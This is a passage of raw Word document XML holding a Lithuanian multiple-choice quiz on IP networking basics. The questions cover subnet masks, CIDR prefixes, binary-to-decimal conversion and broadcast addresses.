          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>192.168.100.0</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27944CCA" w14:textId="238AA697" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>192.168.100.10</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F52B54D" w14:textId="1925ACAD" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>192.168.100.100</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23023599" w14:textId="555E16B4" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>192.168.100.255</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CEF458" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C808B90" w14:textId="50260FA2" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00575225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>uota tinklo kaukė 255.255.0.0</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>. K</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">oks prefiksas atitinka </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>analogišką</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>tinklo kaukę?</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A770AFA" w14:textId="6FE4D189" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>/8</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ECCF71" w14:textId="38476ED4" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>/16</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDF0BDA" w14:textId="277390CF" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>/24</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD66FF5" w14:textId="17872E38" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>/32</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4691C19A" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BD023E" w14:textId="33A6B1A2" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> IP adresui 192.168.100.10 suteikiama B klasės tinklo kaukė</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>. Kokia ji bus</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0BE16F" w14:textId="24DB748A" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>255.0.0.0</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D44228" w14:textId="1CF95916" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>255.255.0.0</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FAC269" w14:textId="121299EB" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>255.255.255.0</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0113BB" w14:textId="6EA7804B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>255.255.255.255</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605EC1C0" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E3BD445" w14:textId="38DB1A10" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00575225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">Pabaikite frazę: </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Dvejetainis skaičius 1 1 0 0 0 0 0 1 dešimtainėje formoje yr</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>a....</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484B15A9" w14:textId="613C37ED" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>192</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038ACFE3" w14:textId="48839CF9" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>193</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55E29F" w14:textId="7C29C908" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>255</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE3DF95" w14:textId="6A122A2B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>256</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D05074E" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F633AB" w14:textId="352A3E83" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Duotas įrenginio IP adresas 88.150.77.20 ir jo tinklo kaukė 255.255.255.224.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Nurodykite, k</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>oks šio tinklo Broadcast adresas?</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24291C89" w14:textId="3163595C" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
